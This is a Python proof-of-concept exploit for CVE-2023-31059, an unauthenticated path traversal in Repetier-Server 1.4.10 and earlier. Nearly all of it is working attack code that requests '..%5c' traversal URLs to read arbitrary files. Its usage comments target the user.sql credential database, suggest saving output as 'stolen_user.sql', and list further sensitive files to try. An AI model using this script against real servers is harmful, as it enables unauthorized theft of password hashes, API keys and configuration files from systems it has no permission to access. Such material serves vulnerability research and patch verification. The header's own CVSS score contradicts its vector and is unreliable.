#!/usr/bin/env python3
# Exploit Title: Repetier-Server <= 1.4.10 - Unauthenticated Path Traversal / Local File Inclusion
# Exploit Author: Mohammed Idrees Banyamer
# Vendor Homepage: https://www.repetier.com/
# Version: <= 1.4.10
# Tested on: Windows 10 / Windows Server 2019 (Repetier-Server default install)
# CVE: CVE-2023-31059
# Advisory: https://cybir.com/2023/cve/poc-repetier-server-140/ (related research)
# CVSS: 9.8 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
#   (Note: the vector string as written scores 7.5 under CVSS v3.x - it is a
#   confidentiality-only vector; 9.8 would require I:H/A:H as well.)
#
# Description:
# Repetier-Server versions up to and including 1.4.10 suffer from an unauthenticated
# path traversal vulnerability via improper sanitization of filename/path parameters
# using Windows backslash encoding (..%5c). This allows remote attackers to read
# arbitrary files from the filesystem, including credential databases (user.sql),
# configuration files, and system files (win.ini, etc.).
#
# Usage:
#   python3 CVE-2023-31059.py http://target:3344/ --file "ProgramData\\Repetier-Server\\database\\user.sql"
#   python3 CVE-2023-31059.py http://target:3344/ --test
#
# Examples:
#   # Quick test with win.ini
#   python3 CVE-2023-31059.py http://192.168.1.50:3344/ --test
#
#   # Extract user database (most valuable target)
#   python3 CVE-2023-31059.py http://10.10.10.123:3344/ --file "ProgramData\\Repetier-Server\\database\\user.sql" --depth 20
#
# Options:
#   --file   Target file path (Windows style with \\)
#   --depth  Traversal depth (default: 15)
#   --test   Use Windows\\win.ini as test target
#
# Notes:
#   - Works best against Windows-hosted Repetier-Server instances
#   - Default web port is 3344
#   - Increase --depth if the target installation path is deeply nested
#   - Successful exploitation usually leaks bcrypt password hashes, usernames, API keys
#   - No authentication required
#
# How to Use
#
# Step 1: Install required library (if not already present)
#   pip install requests
#
# Step 2: Run a simple test to confirm vulnerability
#   python3 CVE-2023-31059.py http://<target>:3344/ --test
#
# Step 3: If vulnerable, try to extract sensitive files
#   python3 CVE-2023-31059.py http://<target>:3344/ \
#       --file "ProgramData\\Repetier-Server\\database\\user.sql" \
#       --depth 18
#
# Step 4: (Optional) Save output to file for analysis
#   python3 CVE-2023-31059.py http://<target> --file ... > stolen_user.sql

import requests
import argparse
import sys
from urllib.parse import urljoin

# One percent-encoded Windows "..\" directory step.
_TRAVERSAL_STEP = "..%5c"


def generate_traversal(depth: int = 15) -> str:
    """Return ``depth`` copies of the encoded ``..\\`` step (``..%5c``) concatenated.

    Args:
        depth: Number of steps; 0 yields an empty string.
    """
    return "".join([_TRAVERSAL_STEP] * depth)


def attempt_read(target_url: str, file_path: str, traversal_depth: int = 15, timeout: int = 10) -> bool:
    """Request ``file_path`` through each known route and report the first apparent hit.

    Args:
        target_url: Base URL of the Repetier-Server web interface (trailing slash optional).
        file_path: Target path whose directory separators are already encoded as ``%5c``.
        traversal_depth: Number of ``..%5c`` steps prepended to ``file_path``.
        timeout: Per-request timeout in seconds handed to ``requests.get``.

    Returns:
        True on the first response that is HTTP 200 with a body longer than 60 bytes,
        False when every route fails or raises a ``requests.RequestException``.
        The status/size check is only a heuristic - a 200 carrying a generic page
        body of more than 60 bytes is also reported as a likely success, so the
        printed preview should be inspected before trusting the result.

    Note:
        Requests are issued with ``verify=False``; TLS certificate validation is
        disabled for https targets, and ``requests`` will emit an
        InsecureRequestWarning for each such call.
    """
    climb = generate_traversal(traversal_depth)
    routes = (
        f"views{climb}{file_path}/base/connectionLost.php",
        f"base/connectionLost.php?file={climb}{file_path}",
    )
    base = target_url.rstrip("/") + "/"

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Attempting to read: {file_path}")
    print(f"[*] Traversal depth: {traversal_depth}")

    for route in routes:
        exploit_url = urljoin(base, route)
        print(f" → Trying: {exploit_url}")
        try:
            response = requests.get(exploit_url, timeout=timeout, verify=False)
        except requests.RequestException as exc:
            print(f" → Error: {exc}")
            continue

        body_len = len(response.content)
        if response.status_code != 200 or body_len <= 60:
            print(f" → Failed (status {response.status_code}, size {body_len})")
            continue

        # Flatten the first 500 characters to a single line for the preview.
        sample = response.text[:500].replace("\n", " ").strip()
        print(f"[+] LIKELY SUCCESS (status {response.status_code}, {body_len} bytes)")
        print(f" Preview:\n {sample}...")
        return True

    return False


def _build_parser() -> argparse.ArgumentParser:
    """Return the command-line parser: positional target plus --file/--depth/--test."""
    parser = argparse.ArgumentParser(
        description="CVE-2023-31059 PoC - Repetier-Server Path Traversal / LFI"
    )
    parser.add_argument("target", help="Target base URL (e.g. http://192.168.1.100:3344/)")
    parser.add_argument(
        "--file",
        default="ProgramData\\Repetier-Server\\database\\user.sql",
        help="File path to read (use Windows \\ separator)",
    )
    parser.add_argument("--depth", type=int, default=15, help="Traversal depth")
    parser.add_argument("--test", action="store_true", help="Quick test with Windows\\win.ini")
    return parser


def main():
    """Parse arguments, print the banner, run one read attempt and print hints on failure."""
    args = _build_parser().parse_args()

    if args.test:
        args.file = "Windows\\win.ini"
        print("[i] Running test mode → targeting Windows\\win.ini")

    # Separators are sent percent-encoded so they match the ..%5c traversal prefix.
    encoded_path = args.file.replace("\\", "%5c")

    rule = "=" * 70
    print(rule)
    print("CVE-2023-31059 Exploit PoC - Repetier-Server <=1.4.10 Path Traversal")
    print("USE ONLY ON SYSTEMS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST!")
    print(rule, "\n")

    if attempt_read(args.target, encoded_path, args.depth):
        return

    hints = (
        "\n[!] Exploitation attempt failed.",
        "Suggestions:",
        " • Increase --depth (try 18–30)",
        " • Verify target is running Repetier-Server <=1.4.10",
        " • Try alternative interesting files:",
        " - ProgramData%5cRepetier-Server%5cconfig.xml",
        " - Windows%5csystem32%5cdrivers%5cetc%5chosts",
    )
    for line in hints:
        print(line)


if __name__ == "__main__":
    main()